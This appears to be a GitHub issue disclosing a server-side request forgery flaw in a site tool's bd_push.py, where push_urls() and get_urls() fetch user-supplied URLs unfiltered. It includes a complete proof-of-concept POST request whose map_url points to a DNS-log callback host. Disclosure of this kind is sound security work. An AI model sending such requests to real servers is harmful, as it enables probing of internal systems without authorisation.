Open v9d0g opened 1 day ago
\apps\tool\apis\bd_push.py does not securely filter user input through push_urls() and get_urls().
def push_urls(url, urls): '''根据百度站长提供的API推送链接''' headers = { 'User-Agent': 'curl/7.12.1', 'Host': 'data.zz.baidu.com', 'Content-Type': 'text/plain', 'Content-Length': '83' } try: html = requests.post(url, headers=headers, data=urls, timeout=5).text return html except: return "{'error':404,'message':'请求超时,接口地址错误!'}" def get_urls(url): '''提取网站sitemap中所有链接,参数必须是sitemap的链接''' try: html = requests.get(url, timeout=5).text except: return 'miss' else: urls = re.findall('<loc>\s*?(.*?)\s*?</loc>', html) return '\n'.join(urls)
Attackers can customize GET or POST requests to cause SSRF.
POST /tool/baidu-linksubmit-sitemap/ HTTP/1.1 Host: 127.0.0.1:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:8000/ Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 120 Origin: http://127.0.0.1:8000 Connection: close Cookie: csrftoken=E7JjnejsrYbCZndzQ7z7CDbvPbqL1E5VfOmVT5uINgM8AvJNEPZI6VvmvzHpzVz8; Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Priority: u=0 csrfmiddlewaretoken=DngWjg7qXZtGABxHkRmtVWsd18Na7TIUe4TyP7iGjh4cbJ3V8zM4peM4Hw4OFac7&url=1&map_url=http://dnslog
\apps\tool\apis\bd_push.py does not securely filter user input through push_urls() and get_urls().
Attackers can customize GET or POST requests to cause SSRF.